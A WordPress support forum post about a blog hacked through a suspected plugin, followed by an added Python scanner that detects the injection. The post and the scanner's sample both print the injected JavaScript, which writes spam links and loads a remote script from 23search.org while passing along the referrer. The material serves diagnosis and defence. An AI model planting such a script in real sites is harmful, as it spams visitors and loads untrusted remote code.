• My 2.5.1 blog was hacked recently, adding links to 23search.com and other places. A malicious script was running in a div near the footer of the blog:

    <script>
    document.write("<H1><a href='https://www.23search.org/?q="+escape(document.referrer)+"'>Proceed to results</a></H1>");
    document.write("\<script");
    document.write(" src=\"https://www.23search.org/?j="+escape(document.referrer)+"\"\>");
    document.write("\<\/script\>");
    </script><h1><a href="https://www.23search.org/?q=http%3A//{my blog's URL}/">Proceed to results</a></h1><script src="https://www.23search.org/?j= ...

    And so on.

    When I tried to find how it had been done, I traced the hack to my plugins. To my surprise, disabling Spam Karma 2 foiled the hack.

    Has anyone encountered this hack before? I’m not sure if it is SK2 itself or one of its plugins, but something is not right.

    And yeah, I feel less secure without SK2, but how can I trust it anymore?

    Thoughts?

  • The topic ‘Hacked via the Spam Karma 2 (SK2) plugin?’ is closed to new replies.
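A defensive check for the pattern quoted in the post above, as an added example that is not part of the original thread: it scans rendered page HTML for inline scripts that use `document.write` to assemble a script tag or read `document.referrer` while pointing at a host other than the blog's own. The sample input is constructed from the snippet in the post; `blog.example`, `scan_html` and `foreign_hosts` are hypothetical names.

```python
import re
from urllib.parse import urlparse

# A whole <script> element: group 1 = attributes, group 2 = inline body.
SCRIPT_BLOCK = re.compile(r"<script\b([^>]*)>(.*?)</script\s*>", re.I | re.S)
# document.write("<script" or the backslash-escaped form "\<script" / "\<\/script".
WRITES_SCRIPT = re.compile(r"document\.write\s*\(\s*[\"']\s*\\?<\\?/?script", re.I)
URL = re.compile(r"https?://[^\s\"'\\<>+)]+", re.I)

def foreign_hosts(text, site_host):
    """Hosts of absolute URLs in text that are not site_host or a subdomain of it."""
    hosts = set()
    for url in URL.findall(text):
        host = (urlparse(url).hostname or "").lower()
        if host and host != site_host and not host.endswith("." + site_host):
            hosts.add(host)
    return sorted(hosts)

def scan_html(html, site_host):
    """Return one finding per <script> element that looks injected."""
    findings = []
    for attrs, body in SCRIPT_BLOCK.findall(html):
        reasons = []
        if WRITES_SCRIPT.search(body):
            reasons.append("document.write builds a script tag")
        if "document.referrer" in body:
            reasons.append("reads document.referrer")
        hosts = foreign_hosts(attrs + " " + body, site_host.lower())
        # Third-party URLs alone are common (CDNs, analytics); require a second signal.
        if hosts and reasons:
            findings.append({"hosts": hosts, "reasons": reasons})
    return findings

# Constructed sample: the script from the post inside a footer div, plus a benign include.
SAMPLE = r'''<div id="footer">
<script>
document.write("<H1><a href='https://www.23search.org/?q="+escape(document.referrer)+"'>Proceed to results</a></H1>");
document.write("\<script");
document.write(" src=\"https://www.23search.org/?j="+escape(document.referrer)+"\"\>");
document.write("\<\/script\>");
</script>
<script src="https://blog.example/wp-includes/js/jquery.js"></script>
</div>'''

if __name__ == "__main__":
    print(scan_html(SAMPLE, "blog.example"))
```

Running the same scan on the saved page source with plugins toggled one at a time shows which plugin's output carries the injected block.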